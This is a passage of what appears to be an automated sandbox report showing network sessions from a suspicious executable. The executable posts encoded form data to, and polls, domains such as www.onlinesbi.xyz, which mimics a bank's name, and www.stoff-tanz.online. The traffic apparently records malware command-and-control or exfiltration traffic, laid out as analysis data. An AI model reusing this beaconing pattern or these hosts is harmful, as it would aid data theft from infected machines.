                                                                                                                                                                          Data Raw: 39 58 3d 42 2b 76 37 30 32 63 6f 42 77 6e 78 71 74 4e 4e 58 6c 38 67 47 2b 61 33 53 46 68 68 45 69 77 47 52 68 6d 53 37 73 41 36 53 67 76 36 78 4f 49 66 44 63 50 72 66 49 51 4e 32 32 32 6e 72 61 62 63 6b 63 35 6b 65 5a 7a 55 37 63 63 31 4b 42 61 6c 49 35 47 39 6a 37 63 38 56 49 7a 35 71 59 62 4d 45 66 71 79 4b 76 2b 5a 70 37 53 64 77 34 4f 48 67 39 6c 51 73 69 6d 5a 4a 2b 64 6a 79 38 39 45 35 47 71 64 51 36 51 43 74 74 69 4c 37 6b 43 41 69 4a 75 4a 69 52 30 39 48 65 31 5a 50 47 32 33 59 48 5a 75 36 45 58 53 6a 44 71 75 7a 5a 4d 5a 43 58 37 47 47 63 35 43 53 62 53 51 69 64 45 43 42 54 68 56 43 66 34 3d
                                                                                                                                                                          Data Ascii: 9X=B+v702coBwnxqtNNXl8gG+a3SFhhEiwGRhmS7sA6Sgv6xOIfDcPrfIQN222nrabckc5keZzU7cc1KBalI5G9j7c8VIz5qYbMEfqyKv+Zp7Sdw4OHg9lQsimZJ+djy89E5GqdQ6QCttiL7kCAiJuJiR09He1ZPG23YHZu6EXSjDquzZMZCX7GGc5CSbSQidECBThVCf4=


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          38192.168.2.5500153.33.130.190802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:15:13.911503077 CEST792OUTPOST /l11k/ HTTP/1.1
                                                                                                                                                                          Host: www.onlinesbi.xyz
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 223
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.onlinesbi.xyz
                                                                                                                                                                          Referer: http://www.onlinesbi.xyz/l11k/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 42 2b 76 37 30 32 63 6f 42 77 6e 78 71 4e 39 4e 57 47 45 67 58 75 61 30 59 6c 68 68 50 43 77 4b 52 6d 75 53 37 75 73 71 53 79 62 36 78 75 34 66 43 64 50 72 59 49 51 4e 39 57 32 69 32 4b 62 43 6b 62 78 57 65 59 50 55 37 59 38 31 4b 45 65 6c 49 4b 75 2b 69 72 63 69 61 6f 7a 2f 75 59 62 4d 45 66 71 79 4b 75 65 67 70 34 69 64 77 4a 2b 48 68 66 42 52 6d 43 6d 65 4f 2b 64 6a 2f 63 38 4e 35 47 72 49 51 34 30 38 74 76 4b 4c 37 6e 57 41 69 63 4f 49 34 42 30 37 45 75 30 50 45 46 72 61 53 47 52 38 32 30 75 70 30 69 4f 51 79 76 39 7a 59 31 7a 75 56 38 56 36 43 49 61 6e 7a 74 6c 72 62 77 78 6c 63 49 74 6d 52 77 61 68 6b 4e 6d 6f 38 61 38 51 32 6d 48 5a 4c 4f 30 30
                                                                                                                                                                          Data Ascii: 9X=B+v702coBwnxqN9NWGEgXua0YlhhPCwKRmuS7usqSyb6xu4fCdPrYIQN9W2i2KbCkbxWeYPU7Y81KEelIKu+irciaoz/uYbMEfqyKuegp4idwJ+HhfBRmCmeO+dj/c8N5GrIQ408tvKL7nWAicOI4B07Eu0PEFraSGR820up0iOQyv9zY1zuV8V6CIanztlrbwxlcItmRwahkNmo8a8Q2mHZLO00


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          39192.168.2.5500163.33.130.190802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:15:16.464860916 CEST1809OUTPOST /l11k/ HTTP/1.1
                                                                                                                                                                          Host: www.onlinesbi.xyz
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 1239
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.onlinesbi.xyz
                                                                                                                                                                          Referer: http://www.onlinesbi.xyz/l11k/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 42 2b 76 37 30 32 63 6f 42 77 6e 78 71 4e 39 4e 57 47 45 67 58 75 61 30 59 6c 68 68 50 43 77 4b 52 6d 75 53 37 75 73 71 53 79 6a 36 78 64 77 66 4e 65 33 72 5a 49 51 4e 6a 6d 32 6a 32 4b 61 65 6b 64 5a 6f 65 59 44 69 37 61 45 31 4d 69 69 6c 5a 4c 75 2b 74 72 63 69 52 49 7a 2b 71 59 61 52 45 5a 4b 32 4b 76 79 67 70 34 69 64 77 4b 57 48 6c 4e 6c 52 67 43 6d 5a 4a 2b 64 56 79 38 39 6b 35 47 79 7a 51 34 67 73 74 2b 71 4c 36 42 32 41 6b 76 6d 49 7a 42 30 35 42 75 30 48 45 46 6e 5a 53 47 64 77 32 30 61 54 30 68 65 51 2b 72 5a 6c 4e 45 44 49 4b 64 38 57 43 4a 47 41 74 49 4a 59 54 44 4a 34 55 76 59 47 59 44 79 4f 75 4a 43 52 39 70 52 64 72 52 54 76 48 5a 74 43 50 4f 77 36 39 36 4a 33 7a 35 5a 79 63 44 30 76 33 43 67 70 76 64 62 67 67 42 42 51 6d 67 5a 74 56 52 67 48 39 48 41 55 6d 4e 76 52 5a 75 66 6c 36 58 51 46 75 6a 51 66 4c 37 7a 57 75 6e 62 44 72 38 6a 4e 61 5a 70 35 53 57 52 59 63 63 76 44 37 4e 48 74 64 58 6e 78 53 38 6b 42 55 34 58 6c 62 46 47 36 53 31 72 63 34 4c 41 6a 76 71 67 42 55 67 6e [TRUNCATED]
                                                                                                                                                                          Data Ascii: 9X=B+v702coBwnxqN9NWGEgXua0YlhhPCwKRmuS7usqSyj6xdwfNe3rZIQNjm2j2KaekdZoeYDi7aE1MiilZLu+trciRIz+qYaREZK2Kvygp4idwKWHlNlRgCmZJ+dVy89k5GyzQ4gst+qL6B2AkvmIzB05Bu0HEFnZSGdw20aT0heQ+rZlNEDIKd8WCJGAtIJYTDJ4UvYGYDyOuJCR9pRdrRTvHZtCPOw696J3z5ZycD0v3CgpvdbggBBQmgZtVRgH9HAUmNvRZufl6XQFujQfL7zWunbDr8jNaZp5SWRYccvD7NHtdXnxS8kBU4XlbFG6S1rc4LAjvqgBUgnxaFxlPoTWYPv4mPDTPNzhrkFHezB32jlZBhNil1YZRTRd5O34QS2bRow6div1w1Oc2B05mv1vHe9k9ndOGelwgzJaVzFnf8UoyA1bWyu1DoG/oIeShDCDpBRhpnQAbTzWLDG0OhYkLzowqJOlWgQeY7DuzqoQjequsMzKY9Aj0xSr8wX46+nC07Xbxa+2xj0wFRxQ3Sr4Ou6nt4ZKxjvRo2Ro0YDREKiAjSQoqgpgjpmeohmgyGTnHVD2CqJLQc6CVIWwqGgmJ6W9byTAgj0sXIod+Jbhp1myK558vDkVjhEl/b7akTocfoki76yMAbWBLgE4cJ5EKZowHyN5Y5qtAn2gU857Jow9Apj31n6jsC+S7Z1wQ/dH1GT2DnsxZgcHJn1zKUBfVxS1ejq8BbiPaU7PI1j6yu9zwE4hzRHMPtH4pj7VKOB7qPbEbUckQWqFIDvZYQ4+phVKUTsmooc94aLOuvcrZZ+SYvY+tHa5wMFjauRIl9XIFBN5SHWdK0iuXcNK80QZHkHsqLE5uKoggmvPhZKZjA5MxgRgSltjTXme4i3Y/tGaZAr5Tx+HuMW2xnUZVADI0DAtbGwC3Nir8BCUb8y6YXN+VETc4WXQgxsqv5Xx/qVlTKV4oI6wrWigckA5xJd0dBIocFAwYmUHODzVPx4uCoIIB [TRUNCATED]


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          40192.168.2.5500173.33.130.190802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:15:19.722328901 CEST521OUTGET /l11k/?1BSHu=OBVxGh8PUTflSv4p&9X=M8Hb3D8JFBWgl8NDQRtnT6SAJ1BxGk45Wmeu29AZTlLv6vUhGfTPJ7wrhjezmM25n5lhbrbM8JcqKDfkJqWfnug4cp36rrKREfuKJ5vJpoiT87e8p+M6jTeOWcRB3/wBow== HTTP/1.1
                                                                                                                                                                          Host: www.onlinesbi.xyz
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Oct 23, 2024 17:15:20.344682932 CEST413INHTTP/1.1 200 OK
                                                                                                                                                                          Server: openresty
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:15:20 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 273
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 31 42 53 48 75 3d 4f 42 56 78 47 68 38 50 55 54 66 6c 53 76 34 70 26 39 58 3d 4d 38 48 62 33 44 38 4a 46 42 57 67 6c 38 4e 44 51 52 74 6e 54 36 53 41 4a 31 42 78 47 6b 34 35 57 6d 65 75 32 39 41 5a 54 6c 4c 76 36 76 55 68 47 66 54 50 4a 37 77 72 68 6a 65 7a 6d 4d 32 35 6e 35 6c 68 62 72 62 4d 38 4a 63 71 4b 44 66 6b 4a 71 57 66 6e 75 67 34 63 70 33 36 72 72 4b 52 45 66 75 4b 4a 35 76 4a 70 6f 69 54 38 37 65 38 70 2b 4d 36 6a 54 65 4f 57 63 52 42 33 2f 77 42 6f 77 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?1BSHu=OBVxGh8PUTflSv4p&9X=M8Hb3D8JFBWgl8NDQRtnT6SAJ1BxGk45Wmeu29AZTlLv6vUhGfTPJ7wrhjezmM25n5lhbrbM8JcqKDfkJqWfnug4cp36rrKREfuKJ5vJpoiT87e8p+M6jTeOWcRB3/wBow=="}</script></head></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          41192.168.2.55001884.32.84.32802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:15:25.430932045 CEST784OUTPOST /nwjc/ HTTP/1.1
                                                                                                                                                                          Host: www.stoff-tanz.online
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 203
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.stoff-tanz.online
                                                                                                                                                                          Referer: http://www.stoff-tanz.online/nwjc/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 69 72 4e 6c 50 79 6b 31 78 70 6f 4c 6b 4e 4f 68 72 79 6b 6e 55 30 62 64 70 76 52 6f 56 68 52 39 38 69 71 37 48 32 4a 71 71 55 37 6a 69 68 44 75 6d 56 4d 74 6a 2f 70 63 76 52 66 4a 44 5a 73 44 75 4a 67 70 73 42 77 68 4e 4d 65 39 59 62 74 77 6e 44 46 67 2f 79 59 67 43 77 66 34 47 6f 70 54 37 42 2b 72 62 52 41 32 46 4d 61 78 48 41 47 64 45 39 63 50 54 69 35 46 39 67 79 37 6f 4f 4b 48 34 67 4a 6e 41 52 69 61 62 30 31 45 4b 61 7a 2b 44 39 30 4b 59 42 71 51 41 78 64 6f 43 66 6c 72 75 65 58 37 5a 56 4e 54 34 43 79 45 79 50 43 78 4a 62 6b 4d 68 65 38 6c 41 68 63 79 49 46 55 65 4a 77 4c 75 76 46 38 3d
                                                                                                                                                                          Data Ascii: 9X=irNlPyk1xpoLkNOhryknU0bdpvRoVhR98iq7H2JqqU7jihDumVMtj/pcvRfJDZsDuJgpsBwhNMe9YbtwnDFg/yYgCwf4GopT7B+rbRA2FMaxHAGdE9cPTi5F9gy7oOKH4gJnARiab01EKaz+D90KYBqQAxdoCflrueX7ZVNT4CyEyPCxJbkMhe8lAhcyIFUeJwLuvF8=


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          42192.168.2.55001984.32.84.32802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:15:27.979361057 CEST804OUTPOST /nwjc/ HTTP/1.1
                                                                                                                                                                          Host: www.stoff-tanz.online
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 223
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.stoff-tanz.online
                                                                                                                                                                          Referer: http://www.stoff-tanz.online/nwjc/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 69 72 4e 6c 50 79 6b 31 78 70 6f 4c 6c 74 65 68 34 43 59 6e 44 6b 62 65 6c 50 52 6f 50 52 52 35 38 69 75 37 48 7a 70 36 72 6d 66 6a 6a 45 2f 75 30 45 4d 74 6b 2f 70 63 68 78 66 4d 4d 35 73 32 75 4a 73 4c 73 45 59 68 4e 4d 4b 39 59 61 64 77 37 67 74 68 74 53 59 69 4f 51 66 36 43 6f 70 54 37 42 2b 72 62 52 6c 62 46 4d 43 78 48 51 32 64 57 4d 63 4d 65 43 35 47 31 41 79 37 2f 2b 4b 44 34 67 4a 52 41 54 62 2f 62 78 78 45 4b 66 50 2b 41 70 6f 4c 57 42 71 57 45 78 63 64 4a 74 5a 6a 70 73 72 6b 65 6e 49 50 67 55 32 79 7a 35 7a 62 54 35 73 6b 79 2b 51 64 51 79 55 46 5a 31 31 33 54 54 62 65 78 53 71 7a 39 56 74 4f 65 4d 58 6f 42 62 2b 65 64 74 77 41 4d 49 6e 7a
                                                                                                                                                                          Data Ascii: 9X=irNlPyk1xpoLlteh4CYnDkbelPRoPRR58iu7Hzp6rmfjjE/u0EMtk/pchxfMM5s2uJsLsEYhNMK9Yadw7gthtSYiOQf6CopT7B+rbRlbFMCxHQ2dWMcMeC5G1Ay7/+KD4gJRATb/bxxEKfP+ApoLWBqWExcdJtZjpsrkenIPgU2yz5zbT5sky+QdQyUFZ113TTbexSqz9VtOeMXoBb+edtwAMInz


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          43192.168.2.55002084.32.84.32802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:15:30.531261921 CEST1821OUTPOST /nwjc/ HTTP/1.1
                                                                                                                                                                          Host: www.stoff-tanz.online
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 1239
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.stoff-tanz.online
                                                                                                                                                                          Referer: http://www.stoff-tanz.online/nwjc/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 69 72 4e 6c 50 79 6b 31 78 70 6f 4c 6c 74 65 68 34 43 59 6e 44 6b 62 65 6c 50 52 6f 50 52 52 35 38 69 75 37 48 7a 70 36 72 6d 58 6a 69 32 48 75 6d 33 6b 74 6c 2f 70 63 70 52 66 4e 4d 35 73 72 75 4a 30 50 73 45 63 58 4e 50 79 39 62 38 4a 77 33 46 52 68 6d 53 59 69 54 67 66 35 47 6f 6f 62 37 46 61 6e 62 52 31 62 46 4d 43 78 48 54 2b 64 56 64 63 4d 63 43 35 46 39 67 79 2f 6f 4f 4b 37 34 67 52 42 41 56 48 46 62 43 4a 45 4a 37 54 2b 4d 38 30 4c 61 42 71 55 44 78 63 46 4a 74 55 39 70 6f 4c 67 65 6d 38 6c 67 54 43 79 78 50 36 4e 48 61 59 54 6c 4e 51 4f 54 67 30 42 44 77 63 4f 55 44 44 39 75 44 2b 76 78 47 52 52 51 72 54 4c 4d 50 6a 70 66 35 77 70 45 4f 50 2b 70 74 46 38 56 49 77 6d 63 6a 51 36 36 32 65 38 6f 6a 66 65 46 74 2f 6b 42 4d 43 4b 6c 35 65 61 31 70 65 73 75 4f 48 57 6b 56 39 63 75 6d 54 74 2b 4e 72 55 61 70 52 76 32 4d 4c 36 7a 6b 75 39 73 52 73 6c 6b 65 33 69 47 6a 52 72 54 67 34 31 2f 53 72 47 79 6c 55 6f 55 36 4b 42 66 77 38 38 78 4f 53 65 33 69 6a 62 63 72 52 78 6a 5a 65 37 74 7a 43 [TRUNCATED]
                                                                                                                                                                          Data Ascii: 9X=irNlPyk1xpoLlteh4CYnDkbelPRoPRR58iu7Hzp6rmXji2Hum3ktl/pcpRfNM5sruJ0PsEcXNPy9b8Jw3FRhmSYiTgf5Goob7FanbR1bFMCxHT+dVdcMcC5F9gy/oOK74gRBAVHFbCJEJ7T+M80LaBqUDxcFJtU9poLgem8lgTCyxP6NHaYTlNQOTg0BDwcOUDD9uD+vxGRRQrTLMPjpf5wpEOP+ptF8VIwmcjQ662e8ojfeFt/kBMCKl5ea1pesuOHWkV9cumTt+NrUapRv2ML6zku9sRslke3iGjRrTg41/SrGylUoU6KBfw88xOSe3ijbcrRxjZe7tzC8N8i6Icf+0ZZzWl8uA5ICzchAgtQDVFr/avAfZMrxCZTrcxp4i6rfMW0+yUdtiBv+FFao5fbGT4VROjdf5+3is7+t3TH7yXP06M4Q8Q5oJrvUgcejcUHbcbVXyYTOvQH8WtgnuH6dpUL+nU6mFBl0+XfpporstxswDiTUy809gvEHytaNtersi/35UGnFylcchSaL8JMfk0Jjw7DYxru3XrGiamBAjROdKpNvllvI7YpNlBwKCftT/SjtvwAIUnhKAcG04pYoZqhSSpWMgUafH160F4qz8LsnijBmQPwH72Gf2vwbMycXVnXYoiKxu3qp1iLRsb0yf88LwFqlGQrJpy7Vs2HdAEeGVx5qN3swXPSeKbu7wzAnIPmKoM4oI9m/O/uk0OK6e2kBTNrXiYPlYetkBXaAET0dqhW9KjjZd2bPMzwoOjq8o5VHqBtFVXd0tM5yeICOr/b6lHa7OEMDcuB/dxLz1JYJipPT9xQngQa/S906g2r/BUjSC0rM4gid6C0BRzFTeGrZ2G1ZNc3ClU7yoyAnjksNT1dqiLoL6Vo3M87tA+1tF+VHb2oTP4LUU/4ILTu13U8B99A/SPgU2uzOdpxhLJuLbijKM1JS7abdCjncQJeRixelVnBhka6m+RNkv9gWyE8SYWLyoi3wbivKZITZSLedi [TRUNCATED]


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          44192.168.2.55002184.32.84.32802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:15:33.112440109 CEST525OUTGET /nwjc/?9X=vplFMCdC7aIsqq2qzVkqAyzG+skkF31Z/0uqLHtS/QTNtUfqlnIz0Od0xQPrBdYo7KQ1sh0HCuzSB788wT4eqStiFQmkDMRSnlHxaQk0f8iMWQ6+S/UMcmd0hzm0v8bMvQ==&1BSHu=OBVxGh8PUTflSv4p HTTP/1.1
                                                                                                                                                                          Host: www.stoff-tanz.online
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Oct 23, 2024 17:15:33.911947966 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                          Server: hcdn
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:15:33 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 10072
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          x-hcdn-request-id: 39f10343f06e37ab57736863e0747cc3-int-edge3
                                                                                                                                                                          Expires: Wed, 23 Oct 2024 15:15:32 GMT
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                                                                                          Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                                                                                                                                          Oct 23, 2024 17:15:33.911992073 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                                                                                                                                          Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                                                                                                                                                          Oct 23, 2024 17:15:33.912026882 CEST1236INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                                                                                                                                                          Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                                                                                                                                                          Oct 23, 2024 17:15:33.912059069 CEST636INData Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                                                                                                                                                          Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                                                                                                                                                          Oct 23, 2024 17:15:33.912092924 CEST1236INData Raw: 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 32 36 35 37 35 39 38 39 2d 34 34 22 20 61 73 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65
